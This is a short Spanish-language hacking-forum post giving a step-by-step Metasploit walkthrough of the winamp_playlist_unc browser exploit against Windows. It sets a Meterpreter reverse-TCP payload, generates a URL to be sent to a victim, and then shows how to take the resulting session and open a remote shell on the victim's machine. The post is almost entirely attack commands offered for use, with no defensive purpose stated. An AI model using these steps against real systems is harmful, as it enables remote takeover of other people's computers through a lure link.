Buenas, estuve revisando la lista de exploits para Navegadores (Browser) de Windows.
Cuando me tope con una de Winamp con lo que me decidí a probarla..
Vamos que es así:
Con el siguiente código usamos el Exploit
use exploit/windows/browser/winamp_playlist_unc
Seleccionamos nuestro Payload de Reversa
set payload windows/meterpreter/reverse_tcp
Acá seteamos nuestra IP localhost
set LHOST
Acá la IP del Server (Nuestra IP)
set SRVHOST
Con este seleccionamos el PUERTO de escucha
set SRVPORT
Finalmente lanzamos el Exploit
exploit
Nos generará una URL la cual debemos pasar al REMOTO, al abrirla si tiene Winamp, se le abrirá automáticamente con este y le dará un mensaje acerca de su lista de reproducción.
A nosotros en la Consola nos llegará un mensaje de una sesión del Meterpreter abierta..
Verificamos la sesión con el comando
sessions
Viendo que en mi caso hay 1 sesión la llamo con
sessions -i 1
Nos llegara el mensaje del meterpreter y con esto ya podríamos llamar la shell remota
shell
Hasta aquí llegamos..
Autor: Kodeinfect
Fuente: Foro Portal Hacker